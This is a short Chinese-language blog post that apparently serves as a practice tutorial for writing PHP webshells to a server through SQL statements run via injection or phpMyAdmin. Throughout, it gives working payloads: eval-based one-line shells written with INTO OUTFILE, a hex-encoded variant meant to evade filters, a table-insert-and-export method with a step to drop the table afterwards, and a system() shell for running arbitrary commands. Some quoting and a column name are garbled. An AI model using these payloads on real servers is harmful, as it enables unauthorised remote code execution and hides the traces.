## 导语
> 今天无意中看见了一篇有关进入phpmyadmin中执行SQL语句写马的文章,自己搭好环境练习了一下
### 正文
我们最常用的方法就是利用SQL注入构造出能够写shell的语句,通常都是这一句:
SELECT ‘<?php @eval($_GET[‘passwd’]);?>‘ INTO OUTFILE ‘C:/wamp/www/1.hack’
</pre>
执行完语句之后,我们发现shell已经被写在了对应目录写的文件里
有时候我们发现自己的shell并没有编写成功,这有可能是我们的shell被过滤掉了,我们可以考虑将shell转成十六进制的编码,再次尝试写马
<pre>SELECT 0x3c3f70687020406576616c28245f504f53545b2768656c6c275d293b3f3e INTO OUTFILE ‘C:/wamp/www/1.hack’</pre>
这时我们可能绕过了过滤成功写马
可能进行了十六进制的编码我们依然无法成功写马,今天我又看见了下面的几种通过phpmyadmin写马的方式,但让前提是我们要进入 **数据库**的**phpmyadmin**
#### 1.我们可以现在数据库的**mysql数据库**中建立一个表shell,表中有字段shell1CREATE TABLE shell(shell1 TEXT NOT NULL);建好后给字段shell1输入values值 ,也就是shellINSERT INTO shell(shell1) VALUES(‘<?php @eval($_POST[pass])?>’);写好这个字段以后,通过以下SQL语句将shell导出数据库
<pre>SELECT she111 from shell INTO OUTFILE ‘c:/wamp/www/1.hack’;</pre>
执行完以上操纵以后,记得删除表哟 **哇哈哈哈哈**DROP TABLE IF EXISTS ‘shell’;#### 2.我们还可以写入PHP函数**system()**来执行系统命令
<pre>SELECT ‘<?PHP echo ‘<pre>’;system($_GET[‘cmd’])?>;echo ‘</pre>‘’;> 标签
>
>
>
> 目的是让返回的结果,保持原有的换行等操作,方便我们的查看
之后我们就可以通过shell执行系统指令了,如下图
这次先总结这么多的写shell的方法,以后发现新的了还会继续~~